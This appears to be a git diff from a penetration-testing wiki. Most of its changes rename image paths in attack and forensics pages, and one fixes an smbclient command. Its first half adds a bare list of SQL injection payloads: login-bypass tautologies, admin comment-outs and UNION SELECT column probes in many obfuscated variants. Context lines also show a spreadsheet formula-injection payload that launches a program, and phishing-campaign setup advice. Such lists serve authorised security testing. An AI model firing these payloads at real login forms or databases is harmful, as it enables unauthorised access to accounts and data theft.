+')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index cdfd09a15..8a4cff8f4 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -10,7 +10,7 @@ dht udp "DHT Nodes" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png>) InfluxDB diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 421914e52..2c77353d4 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -389,7 +389,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`** Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (621) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (621) (1) (1) (1) (1) (1).png>) Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 73f3d9bf2..55b9d4b03 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (2).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (2).png>) An then use the following code diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index be695d67e..b243e65ca 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (2).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png>) ### USB Detective diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md index e45109769..6b7c1e8c0 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png>) ### Step 6: Profile Installation diff --git a/mobile-apps-pentesting/ios-pentesting/README.md b/mobile-apps-pentesting/ios-pentesting/README.md index 88ad8b65e..9b6ae0af7 100644 --- a/mobile-apps-pentesting/ios-pentesting/README.md +++ b/mobile-apps-pentesting/ios-pentesting/README.md @@ -614,7 +614,7 @@ Many apps log informative (and potentially sensitive) messages to the console lo 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. -![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (2).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md index 5f257952f..0a103d4ec 100644 --- a/pentesting-web/formula-injection.md +++ b/pentesting-web/formula-injection.md @@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1).png>) +![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png>) ### More diff --git a/pentesting-web/saml-attacks/README.md b/pentesting-web/saml-attacks/README.md index 562419943..5782e107c 100644 --- a/pentesting-web/saml-attacks/README.md +++ b/pentesting-web/saml-attacks/README.md @@ -8,7 +8,7 @@ ## Attacks Graphic -![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (3).png>) +![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (3).png>) ## Tool diff --git a/pentesting/pentesting-smb.md b/pentesting/pentesting-smb.md index 82e082af7..e72ca048f 100644 --- a/pentesting/pentesting-smb.md +++ b/pentesting/pentesting-smb.md @@ -482,8 +482,8 @@ Entry_1: With Creds smbmap -H {IP} -u {Username} -p {Password} - smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP} - smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP} --pw-nt-hash `hash` + smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} + smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash` crackmapexec smb {IP} -u {Username} -p {Password} --shares GetADUsers.py {Domain_Name}/{Username}:{Password} -all GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat diff --git a/pentesting/pentesting-web/iis-internet-information-services.md b/pentesting/pentesting-web/iis-internet-information-services.md index a4fc709c4..34504b660 100644 --- a/pentesting/pentesting-web/iis-internet-information-services.md +++ b/pentesting/pentesting-web/iis-internet-information-services.md @@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index a6c2070cc..a7ce30c46 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md @@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1).png>) +![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png>) ![](<../../.gitbook/assets/image (102).png>) diff --git a/phishing-methodology/README.md b/phishing-methodology/README.md index 2d6e47658..93b8adec4 100644 --- a/phishing-methodology/README.md +++ b/phishing-methodology/README.md @@ -339,7 +339,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (4).png>) +![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (4).png>) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\